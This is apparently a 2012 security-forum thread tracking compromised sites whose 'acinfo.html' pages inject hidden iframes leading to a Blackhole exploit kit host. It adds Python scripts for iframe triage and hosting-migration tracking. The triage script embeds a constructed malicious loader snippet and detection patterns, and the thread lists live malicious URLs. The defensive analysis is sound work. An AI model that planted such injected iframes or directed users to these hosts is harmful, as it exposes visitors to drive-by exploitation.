To Website Analyst: Rise of the Malicious "acinfo.html"

6 malicious acinfo.html sites were found on 2012-07-06 08:31:51. Let's look at them together.

Site A (Host: humanas.rs):
URLQuery | VirusTotal | Zulu Scanner | Sucuri SiteCheck | URLVoid

First thing, we get:
hotspotboutique.net/main.php?page=f00fe909ad13ba45
(referer=humanas.rs/acinfo.html)failure: <urlopen error [Errno -2] Name or service not known>

The homepage looks regular, but when we check the “acinfo.html”, we get:
humanas.rs/acinfo.html
[decodingLevel=0] found JavaScript
DecodedIframe detected
[var s] URL=humanas.rs/ if
[var newurl] URL=humanas.rs/ if
[iframe] hotspotboutique.net/main.php?page=f00fe909ad13ba45
[decodingLevel=1] found JavaScript

We also get the phish title “NACHA - The Electronic Payments Association -” mentioned here (another acinfo.html site explained here). This site also has the same algorithm given in the above link. This provides evidence that this specific algorithm and this phish title will be used again in the future.

Site B (Host: ykwh.gov.cn):
URLQuery | VirusTotal | Zulu Scanner | Sucuri SiteCheck | URLVoid

Here, we get the same intro as Site A, assuming a partnership with the domains:
hotspotboutique.net/main.php?page=f00fe909ad13ba45
(referer=ykwh.gov.cn/acinfo.html)failure: <urlopen error [Errno -2] Name or service not known>

Several SWF files are also present. Results: top.swf | flash2.swf | focus1.swf

The main threat, “acinfo.html”, looks exactly like Site A.
ykwh.gov.cn/acinfo.html
[decodingLevel=0] found JavaScript
DecodedIframe detected
[var s] URL=ykwh.gov.cn/ if
[var newurl] URL=ykwh.gov.cn/ if
[iframe] hotspotboutique.net/main.php?page=f00fe909ad13ba45
[decodingLevel=1] found JavaScript

Site C (Host: spbfencing.ru) -Taken Down-:
URLQuery | VirusTotal | Zulu Scanner | Sucuri SiteCheck | URLVoid

404 from wplus.net. It appears the site was found malicious and taken down.

Site D (Host: wk999.com.cn) -???-:
URLQuery | VirusTotal | Zulu Scanner | Sucuri SiteCheck | URLVoid

The only thing happening on this page is a redirect to “/acinfo/” using the window.location method. Nothing suspect in the redirected page. Moving along…

Site E (Host: blog.cd3d.com.cn):
URLQuery | VirusTotal | Zulu Scanner | Sucuri SiteCheck | URLVoid

hotspotboutique.net/main.php?page=f00fe909ad13ba45
(referer=blog.cd3d.com.cn/acinfo.html)failure: <urlopen error [Errno -2] Name or service not known>

Same iframe, same phish title, and same algorithm from Site A and B. Now we know we have something.

Site F (Host: apps.org.rs):
URLQuery | VirusTotal | Zulu Scanner | Sucuri SiteCheck | URLVoid

hotspotboutique.net/main.php?page=f00fe909ad13ba45
(referer=apps.org.rs/acinfo.html)failure: <urlopen error [Errno -2] Name or service not known>

Same algorithm as all above.

=================================

So in summary, the “acinfo.html” sites appear to call the known blackhole exploit hotspot “hotspotboutique.net”. This filename should be considered suspicious.

~!Donovan
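An added example (not code from the thread or from any of the scanners it names) of the kind of static triage that produces the [iframe] and [var] lines quoted above: it collects inline scripts, rejoins split string literals, pulls out any iframe source a script would write into the page, and compares the target host with the page's own host and a small blocklist. The sample HTML, the benign comparison page, the indicator names, the blocklist and the function names are constructed for this example; hotspotboutique.net is the landing host named in the post.

```python
"""Static triage of an HTML page for script-injected iframes.

Added example; the page samples, indicator names and blocklist are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample in the shape the thread describes for acinfo.html: a short
# inline script that assembles a hidden off-site <iframe> from split string
# literals and writes it into the page. Not the actual page content.
SAMPLE_HTML = r'''<html><body><h1>Account information</h1>
<script type="text/javascript">
var s = "<ifr" + "ame src=\"http://hotspotboutique.net/main.php?page=f00fe909ad13ba45\" width=1 height=1 style=\"visibility:hidden\"></iframe>";
document.write(s);
</script>
</body></html>'''

# Constructed benign page for comparison: an ordinary script and a same-site iframe.
CLEAN_HTML = '''<html><body><span id="year"></span>
<script>document.getElementById("year").textContent = new Date().getFullYear();</script>
<iframe src="/widgets/calendar.html"></iframe>
</body></html>'''

# Hypothetical blocklist; the host is the landing page named in the thread.
KNOWN_BAD = {"hotspotboutique.net"}

# Cheap indicators of the loader pattern; none is conclusive on its own.
INDICATORS = {
    "eval": re.compile(r"\beval\s*\("),
    "document.write": re.compile(r"document\.write\s*\("),
    "unescape/fromCharCode": re.compile(r"\bunescape\s*\(|fromCharCode"),
    "split-tag-string": re.compile(r"""["']<[a-z]*["']\s*\+\s*["']""", re.I),
    "hidden-or-tiny-frame": re.compile(
        r"""visibility\s*:\s*hidden|display\s*:\s*none|(?:width|height)\s*=\s*\\?["']?[0-9]\b""", re.I),
}
# src of an iframe tag, also when the tag sits inside a JS string with escaped quotes
IFRAME_SRC = re.compile(r"""<iframe\b[^>]*?\bsrc\s*=\s*\\?["']?([^"'\\\s>]+)""", re.I)


class _PageCollector(HTMLParser):
    """Collects inline <script> bodies and the src of iframes present in the markup."""

    def __init__(self):
        super().__init__()
        self._in_script = False
        self.scripts = []
        self.static_iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append("")
        elif tag == "iframe":
            src = dict(attrs).get("src")
            if src:
                self.static_iframes.append(src)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data


def _join_literals(script):
    """Rejoin "ab" + "cd" style concatenations so split tag names become visible."""
    return re.sub(r"'\s*\+\s*'", "", re.sub(r'"\s*\+\s*"', "", script))


def triage(html, page_host, known_bad=KNOWN_BAD):
    """Return indicators, iframe targets and a verdict for one page."""
    page = _PageCollector()
    page.feed(html)
    indicators = set()
    script_iframes = []
    for script in page.scripts:
        for name, pattern in INDICATORS.items():
            if pattern.search(script):
                indicators.add(name)
        script_iframes += IFRAME_SRC.findall(_join_literals(script))
    hosts = {urlsplit(u).hostname for u in script_iframes + page.static_iframes}
    offsite = sorted(h for h in hosts if h and h != page_host)
    bad = sorted(h for h in offsite if h in known_bad)
    if bad:
        verdict = "malicious"        # off-site frame to a known landing host
    elif script_iframes and (offsite or indicators):
        verdict = "suspicious"       # script-written frame plus loader traits
    else:
        verdict = "clean"
    report = [f"[indicator] {n}" for n in sorted(indicators)]
    report += [f"[iframe] {u}" for u in script_iframes]
    return {"scripts": len(page.scripts), "indicators": sorted(indicators),
            "script_iframes": script_iframes, "offsite_hosts": offsite,
            "known_bad_hosts": bad, "verdict": verdict, "report": report}


if __name__ == "__main__":
    for host, html in (("humanas.rs", SAMPLE_HTML), ("example.org", CLEAN_HTML)):
        result = triage(html, host)
        print(f"{host}: {result['verdict']}")
        for line in result["report"]:
            print("  " + line)
```

The verdict deliberately separates "known landing host" from "unknown off-site frame written by a script with loader traits": the first is a blocklist hit, the second is the signal that surfaces a new hop of the same campaign before any list catches up. Without the blocklist the sample page still scores as suspicious.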

Hi !Donovan,

Real-time check reveals that hotspotboutique dot net is being blocked as seen by mob view resources…
2012/07/06_06:07 hotspotboutique dot net/main.php?page=f00fe909ad13ba45 109.164.221.176 cust.static.109-164-221-176.swisscomdata dot ch. Blackhole exploit kit Registrant ironeggmanATyahoo.com 44038 as on Malware Domain List
Mind the script marked as malicious here: http://urlquery.net/report.php?id=83575
But GoogleSafebrowsing has also been alerted for this as we can see here: http://www.google.com/safebrowsing/diagnostic?site=http://hotspotboutique.net/main.php?page=f00fe909ad13ba45
and with WebBug I get an 11004 [11004] Valid name, no data record (check DNS setup),
because my avast Web Shield neatly blocks this malicious site or file as JS:Blackhole-X[Trj].
Conclusion: we have detection from the avast shields. We are being protected!

polonus

A new one today. See: http://urlquery.net/report.php?id=89577
Many antiviruses now detect this threat, including avast! :slight_smile:
https://www.virustotal.com/file/f4a890f6cbca08ea737e16098a9e60610dc3b41a4a88f2d3b9d5630a904889b7/analysis/

At VirusTotal, only Fortinet.

Sucuri
http://sitecheck.sucuri.net/results/projekt.mops.lodz.pl

Zulu analyzer
http://zulu.zscaler.com/submission/show/37e4289b823d965f9df3a4be0c03dd4a-1342187446

Hmm… the VT result I get comes up with the wrong scan date?

On Jotti:
http://virusscan.jotti.org/en/scanresult/f92a823d37b47f3d9abeec9368fefad83d9a5ce9

Hi Pondus,

I get:


AntiVir		JS/BlacoleRef.BS 
Avast		JS:Blacole-X [Trj] 
BitDefender	Trojan.JS.Iframe.BOT
Commtouch	JS/IFrame.QY.gen
DrWeb		Exploit.BlackHole.12
Emsisoft	Trojan.JS.Blacole!IK
F-Prot		JS/IFrame.QY.gen
F-Secure	Trojan.JS.Iframe.BOT
Fortinet	JS/Iframe.W!tr
GData		Trojan.JS.Iframe.BOT
Ikarus		Trojan.JS.Blacole
McAfee		JS/Exploit-Blacole.ek
Microsoft	Trojan:JS/BlacoleRef.BS
Norman		JS/Blacole.GL
nProtect	Trojan.JS.Iframe.BOT
Sophos		Troj/ExpJs-CI 
TrendMicro	TROJ_GEN.RFFH1G9

Clicking on your VT link I now get the correct scan date… and an 18/42 result.
Guess it was a hiccup at VT :wink:

Googling for acinfo.html you get many results for this particular malware campaign.
Just some examples:
http://urlquery.net/report.php?id=83207
http://urlquery.net/report.php?id=84601
http://urlquery.net/report.php?id=89577
Sucuri detects it here: http://sitecheck.sucuri.net/results/apps.org.rs/acinfo.html
and Scumware here: 2012-07-09 15:08:53 htxp://garmonia-milk.ru/acinfo.html DF0D2D9BBD03FFB76C798E35B5C5C1F7 195.131.162.2 RU Trojan.JS.Iframe.BOT

polonus

3 More Here:
http://urlquery.net/report.php?id=89664
http://urlquery.net/report.php?id=89666
http://urlquery.net/report.php?id=89668

All use different IPs. Is it possible for one vendor to use multiple IPs?

Hi !Donovan,

Normally there is no legit issue, but this should not be performed at the same time, having duplicate content on various IPs. Only if you're updating content while a search engine is spidering it at the other server may you have created an issue. You only have to find a very cooperative dedicated host, and cybercriminals often do meet these friendly forces, or rather lenient ones…
So we actively have to monitor the availability of each server. This whole exercise with malware is called malware migration, and on VirusWatch you can follow these migration patterns on a daily basis, plus malware that is being taken down, often by consent of the malcreants, who move their circus elsewhere to open up shop and carry on.
Sometimes the malware is being closed or is no longer responsive. Sometimes new versions are being launched from one domain in an ever-changing sequence through ever-changing URL addresses and file names, spewing the same malcreations or unique variations on the same theme.
With urlquery dot net IDS alerts it is striking that over time you see various IP numbers for the same domain name, sometimes with 1 or more alerts, sometimes without one.

polonus
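An added example, not part of the thread or of any feed it names, of the bookkeeping polonus describes: parsing feed lines in the layout quoted earlier in the thread (date, URL, IP, reverse DNS, description, registrant, ASN), recording each domain's sequence of hosting IPs and ASNs over time, and listing IPs shared by several domains. The feed lines are constructed with documentation IPs and ASNs; hotspotboutique.net is the domain under discussion, victim-site.example and the second page id are placeholders, and the function names are this example's own.

```python
"""Track hosting changes ("malware migration") per domain from a blocklist feed.

Added example; the feed lines are constructed, not real feed data.
"""
from datetime import datetime
from urllib.parse import urlsplit

# Constructed lines in the layout quoted in the thread:
#   date url ip reverse_dns description registrant asn
# IPs are RFC 5737 documentation addresses, ASNs are RFC 5398 documentation
# ASNs, "-" marks an empty field. The second page id is a placeholder.
FEED = """\
2012/07/06_06:07 hotspotboutique.net/main.php?page=f00fe909ad13ba45 192.0.2.10 host-10.isp-a.test Blackhole exploit kit registrant@example.test 64496
2012/07/08_11:20 hotspotboutique.net/main.php?page=f00fe909ad13ba45 198.51.100.7 host-7.colo-b.test Blackhole exploit kit registrant@example.test 64497
2012/07/09_15:08 victim-site.example/acinfo.html 203.0.113.5 - Trojan.JS.Iframe.BOT - 64498
2012/07/11_09:45 hotspotboutique.net/main.php?page=0123456789abcdef 203.0.113.5 - Blackhole exploit kit registrant@example.test 64498
2012/07/11_09:50 hotspotboutique.net/main.php?page=0123456789abcdef 203.0.113.5 - Blackhole exploit kit registrant@example.test 64498
"""


def parse_feed(text):
    """Parse feed lines into records; only the description may contain spaces."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 7:
            continue  # malformed line: not enough fixed fields
        records.append({
            "seen": datetime.strptime(parts[0], "%Y/%m/%d_%H:%M"),
            "url": parts[1],
            "host": urlsplit("http://" + parts[1]).hostname,
            "ip": parts[2],
            "rdns": parts[3],
            "description": " ".join(parts[4:-2]),
            "registrant": parts[-2],
            "asn": int(parts[-1]),
        })
    return records


def migration_report(records):
    """Per domain: ordered hosting hops (IP, ASN, first seen), ASNs, paths, migrated flag."""
    report = {}
    for rec in sorted(records, key=lambda r: r["seen"]):
        entry = report.setdefault(rec["host"], {"hops": [], "asns": set(), "paths": set()})
        hops = entry["hops"]
        # a new hop only when the IP differs from the previous sighting
        if not hops or hops[-1]["ip"] != rec["ip"]:
            hops.append({"ip": rec["ip"], "asn": rec["asn"],
                         "first_seen": rec["seen"].isoformat(timespec="minutes")})
        entry["asns"].add(rec["asn"])
        entry["paths"].add(rec["url"].partition("/")[2])
    for entry in report.values():
        entry["migrated"] = len({h["ip"] for h in entry["hops"]}) > 1
        entry["asns"] = sorted(entry["asns"])
        entry["paths"] = sorted(entry["paths"])
    return report


def shared_ips(records):
    """IPs seen hosting more than one domain (co-hosting on the same provider)."""
    by_ip = {}
    for rec in records:
        by_ip.setdefault(rec["ip"], set()).add(rec["host"])
    return {ip: sorted(hosts) for ip, hosts in by_ip.items() if len(hosts) > 1}


if __name__ == "__main__":
    recs = parse_feed(FEED)
    for host, entry in migration_report(recs).items():
        hops = " -> ".join(f"{h['ip']} (AS{h['asn']}, {h['first_seen']})" for h in entry["hops"])
        print(f"{host}: migrated={entry['migrated']} hops: {hops}")
    for ip, hosts in shared_ips(recs).items():
        print(f"{ip} shared by {', '.join(hosts)}")
```

Keying the hops on IP change rather than on every sighting keeps the timeline readable when a feed reports the same host several times a day; the ASN list alongside it is what shows whether the move crossed providers, which is the pattern the post describes.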

Hi !Donovan,

Interesting webmaster’s discussion on this particular malware:
http://stackoverflow.com/questions/11414694/typo3-function-generates-trojan-js-blacoleref-bs-every-time-new
Reply there from maholtz on a question from testing.
For detection scores see JS/BlacoleRef.BS at VW
here just 2

polonus

Here we have another: http://urlquery.net/report.php?id=99344

Still alive after 5+ days.

19/42 antiviruses now detect the contents of these malicious acinfo.html pages. See:
https://www.virustotal.com/file/f4a890f6cbca08ea737e16098a9e60610dc3b41a4a88f2d3b9d5630a904889b7/analysis/
Eh… the above is outdated, so let's hope more detect it ATM.

Hi !Donovan,

Is this code in the attached image the malcode you refer to?
Get a live response from dungtank GitHub for this URL.

polonus

Yeah,

If you look closely, you notice eval.

Hi !Donovan,

Again going to htxp://hotspotboutique.net/main.php. The good thing about it is that we have avast Web Shield detection for it as JS:Blackole-X[Trj].
So we have protection,

polonus

This one has already been closed: http://www.google.com/safebrowsing/diagnostic?site=winners.co.rs/acinfo.html

The requested URL /acinfo.html was not found on this server.
Additionally, a 403 Forbidden
error was encountered while trying to use an ErrorDocument to handle the request.
See on trojan Cridex: http://cbnetsecurity.com/colors/archives/825 (link author cristian on Eye on Spam)
Do a look-up there and you will see the IP for the malware is undef for the mdl_trojan Cridex senderbase;
contributor was Malware Domain List.
Malicious software consists of 213 trojans, 15 scripting exploits, 7 exploits.

Site is being hosted on 3 networks, e.g.: AS17772 (CHINACOM), AS44038 (BLUEWIN), AS20860 (IOMART).

polonus